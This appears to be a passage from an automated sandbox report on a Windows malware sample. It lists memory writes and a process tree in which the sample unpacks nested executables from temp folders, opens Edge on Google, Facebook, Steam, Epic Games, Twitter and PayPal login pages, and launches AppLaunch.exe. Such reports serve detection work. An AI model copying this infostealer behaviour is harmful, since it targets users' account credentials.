PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4856 wrote to memory of 5396 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.2a18f4184897d97d571bae0e6f246e458b7773e32effe335b08beb717e641ce0.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Lj9gA12.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Er0uW61.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1gJ47Yq4.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdb91446f8,0x7ffdb9144708,0x7ffdb9144718

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2Cf5242.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,3044931681823620667,12414061407216790580,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,10790248111191077607,10303531561963982845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,10790248111191077607,10303531561963982845,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,701871821419763544,18307310049354167736,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,701871821419763544,18307310049354167736,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,3044931681823620667,12414061407216790580,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1780,1017667590340143429,12848925900103415440,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1780,1017667590340143429,12848925900103415440,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,5721535188051344480,17370459632319772641,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,5721535188051344480,17370459632319772641,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,4219469405257606188,1988454598763064376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,4219469405257606188,1988454598763064376,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,9882785725250652790,841354470109751662,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,9882785725250652790,841354470109751662,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,10010837553238454039,2829693857467305620,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,8470878042280355721,5481356603657520018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,13482603480293722167,7441965237190976998,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

